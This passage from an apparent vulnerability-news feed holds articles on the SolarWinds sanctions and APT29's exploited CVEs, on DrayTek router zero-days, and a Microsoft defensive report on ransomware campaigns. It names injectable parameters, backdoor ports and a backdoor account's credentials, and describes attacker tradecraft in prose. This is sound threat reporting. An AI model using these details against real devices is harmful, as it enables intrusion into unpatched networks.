on Thursday formally attributed the supply chain attack of IT infrastructure management company SolarWinds with \"high confidence\" to government operatives working for Russia's Foreign Intelligence Service (SVR).\n\n\"Russia's pattern of malign behaviour around the world \u2013 whether in cyberspace, in election interference or in the aggressive operations of their intelligence services \u2013 demonstrates that Russia remains the most acute threat to the U.K.'s national and collective security,\" the U.K. government [said](<https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services>) in a statement.\n\nTo that effect, the U.S. Department of the Treasury has imposed sweeping sanctions against Russia for \"undermining the conduct of free and fair elections and democratic institutions\" in the U.S. and for its role in facilitating the sprawling SolarWinds hack, while also barring six technology companies in the country that provide support to the cyber program run by Russian Intelligence Services.\n\n[](<https://thehackernews.com/images/-3aKGKEh2OCw/YHhnxG35qkI/AAAAAAAACSQ/DNi8MHTziNkZeNqP2Y6g9DXrwuwcIBooQCLcBGAsYHQ/s0/russian-hacker.jpg>)\n\nThe companies include ERA Technopolis, Pasit, Federal State Autonomous Scientific Establishment Scientific Research Institute Specialized Security Computing Devices and Automation (SVA), Neobit, Advanced System Technology, and Pozitiv Teknolodzhiz (Positive Technologies), the last three of which are IT security firms whose customers are said to include the Russian Ministry of Defense, SVR, and Russia's Federal Security Service (FSB).\n\n\"As a company, we deny the groundless accusations made by the U.S. Department of the Treasury,\" Positive Technologies [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-official-statement-following-u-s-sanctions/>) in a statement. 
\"In the almost 20 years we have been operating there has been no evidence of the results of Positive Technologies\u2019 research being used in violation of the principles of business transparency and the ethical exchange of information with the professional information security community.\"\n\nIn addition, the Biden administration is also [expelling ten members](<https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20210415>) of Russia's diplomatic mission in Washington, D.C., including representatives of its intelligence services.\n\n\"The scope and scale of this compromise combined with Russia's history of carrying out reckless and disruptive cyber operations makes it a national security concern,\" the Treasury Department [said](<https://home.treasury.gov/news/press-releases/jy0127>). \"The SVR has put at risk the global technology supply chain by allowing malware to be installed on the machines of tens of thousands of SolarWinds' customers.\"\n\nFor its part, Moscow had previously [denied involvement](<https://thehackernews.com/2021/01/fbi-cisa-nsa-officially-blames-russia.html>) in the broad-scope SolarWinds campaign, stating \"it does not conduct offensive operations in the cyber domain.\"\n\nThe [intrusions](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) came to light in December 2020 when FireEye and other cybersecurity firms revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor with the goal of gathering sensitive information.\n\nUp to 18,000 SolarWinds customers are believed to have received the trojanized Orion update, although the attackers carefully selected their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop malware based on an initial reconnaissance of the target environment for high-value 
accounts and assets.\n\n[](<https://thehackernews.com/images/-K6oDMn9wijo/YHhoAIB7XMI/AAAAAAAACSU/SnX4nr33cRUwtWpMv58gmUlwM1J3GLbGwCLcBGAsYHQ/s0/hack.jpg>)\n\nThe adversary's compromise of the SolarWinds software supply chain is said to have given it the ability to remotely spy or potentially disrupt more than 16,000 computer systems worldwide, according to the [executive order](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) issued by the U.S. government.\n\nBesides infiltrating the networks of [Microsoft](<https://thehackernews.com/2020/12/microsoft-says-its-systems-were-also.html>), [FireEye](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>), [Malwarebytes](<https://thehackernews.com/2021/01/solarwinds-hackers-also-breached.html>), and [Mimecast](<https://thehackernews.com/2021/03/mimecast-finds-solarwinds-hackers-stole.html>), the attackers are also said to have used SolarWinds as a stepping stone to breaching several U.S. 
agencies such as the National Aeronautics and Space Administration (NASA), the Federal Aviation Administration (FAA), and the Departments of State, Justice, Commerce, Homeland Security, Energy, Treasury, and the National Institutes of Health.\n\nThe SVR actor is also known by other names such as APT29, Cozy Bear, and The Dukes, with the threat group being tracked under different monikers, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Nobelium (Microsoft).\n\n[](<https://thehackernews.com/images/-JJfhuyyCe1A/YHhoT2JBRoI/AAAAAAAACSg/KKZjhhWheAYDqRlyZsylSiqZ6TohQDq4ACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nFurthermore, the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>), warning businesses of active exploitation of five publicly known vulnerabilities by APT29 to gain initial footholds into victim devices and networks \u2014 \n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway \n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\nIn a statement shared with The Hacker News, Pulse Secure said the issue identified by the NSA concerns a flaw that was patched on [legacy deployments in April 
2019](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), and that \"customers who followed the instructions in a Pulse Secure security advisory issued at that time have properly protected their systems and mitigated the threat.\"\n\n\"We see what Russia is doing to undermine our democracies,\" said U.K. Foreign Secretary Dominic Raab. \"The U.K. and U.S. are calling out Russia's malicious behaviour, to enable our international partners and businesses at home to better defend and prepare themselves against this kind of action.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-15T16:55:00", "type": "thn", "title": "US Sanctions Russia and Expels 10 Diplomats Over SolarWinds Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", 
"CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-04T10:27:04", "id": "THN:461B7AEC7D12A32B4ED085F0EA213502", "href": "https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:32", "description": "[](<https://thehackernews.com/images/-Z_aTWSdaH3I/Xn5uoGxc-nI/AAAAAAAA2mQ/5EcPBIwVTiMspvURwUA6ipAwRq2Y0if6QCLcBGAsYHQ/s728-e100/enterprise-network-security.jpg>)\n\nCybersecurity researchers with Qihoo 360's NetLab today unveiled details of two recently spotted zero-day cyberattack campaigns in the wild targeting enterprise-grade networking devices manufactured by Taiwan-based DrayTek. \n \nAccording to the [report](<https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/>), at least two separate groups of hackers exploited two critical remote command injection vulnerabilities (**CVE-2020-8515**) affecting DrayTek Vigor enterprise switches, load-balancers, routers and VPN gateway devices to eavesdrop on network traffic and install backdoors. \n \nThe zero-day attacks started somewhere at the end of last November or at the beginning of December and are potentially still ongoing against thousands of publicly exposed **DrayTek switche**s, **Vigor 2960, 3900, 300B** devices that haven't yet been patched with the latest [firmware updates](<https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-\\(cve-2020-8515\\)/>) released last month. \n \nThe zero-day vulnerabilities in question can be exploited by any unauthorized remote attackers to inject and execute arbitrary commands on the system, as also [detailed](<https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html>) by a separate researcher on his blog. 
\n \n\"The two 0-day vulnerability command injection points are keyPath and rtick, located in the /www/cgi-bin/mainfunction.cgi, and the corresponding Web Server program is /usr/sbin/lighttpd,\" the report says. \n \nNetLab researchers have not yet attributed either attack to a specific group, but they did confirm that while the first group simply spied on the network traffic, the second group of attackers used the rtick command injection vulnerability to create: \n \n * a web-session backdoor that never expires,\n * an SSH backdoor on TCP ports 22335 and 32459,\n * a system backdoor account with user \"wuwuhanhan\" and password \"caonimuqin.\"\n \nNote that if you have only recently installed the patched firmware, or are installing it now, it won't remove the backdoor accounts automatically if you're already compromised. \n \n\"We recommend that DrayTek Vigor users check and update their firmware in a timely manner and check whether there is a tcpdump process, SSH backdoor account, Web Session backdoor, etc. on their systems.\" \n \n\"If you have remote access enabled on your router, disable it if you don't need it, and use an access control list if possible,\" the company suggests. 
\n \nThe list of affected firmware versions is as follows: \n \n * Vigor2960 < v1.5.1\n * Vigor300B < v1.5.1\n * Vigor3900 < v1.5.1\n * VigorSwitch20P2121 <= v2.3.2\n * VigorSwitch20G1280 <= v2.3.2\n * VigorSwitch20P1280 <= v2.3.2\n * VigorSwitch20G2280 <= v2.3.2\n * VigorSwitch20P2280 <= v2.3.2\n \nAffected companies and individuals are highly recommended to install the latest firmware updates to completely protect their valuable networks against malware and emerging online threats. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-27T21:22:00", "type": "thn", "title": "Hackers Exploit Zero-Day Bugs in Draytek Devices to Target Enterprise Networks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8515"], "modified": "2020-03-29T18:22:23", "id": "THN:7312C296214FCDE145DA02B933FB28F6", "href": 
"https://thehackernews.com/2020/03/draytek-network-hacking.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2020-04-30T23:04:13", "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. 
The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. 
They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. 
On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. 
RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. 
These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec and eventually deploy the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. 
Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. 
REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. 
Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. 
Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavior-based hunting where possible, and on hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. 
[Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. 
Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. 
Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assessments to measure security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. 
And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protection (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. 
On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust 
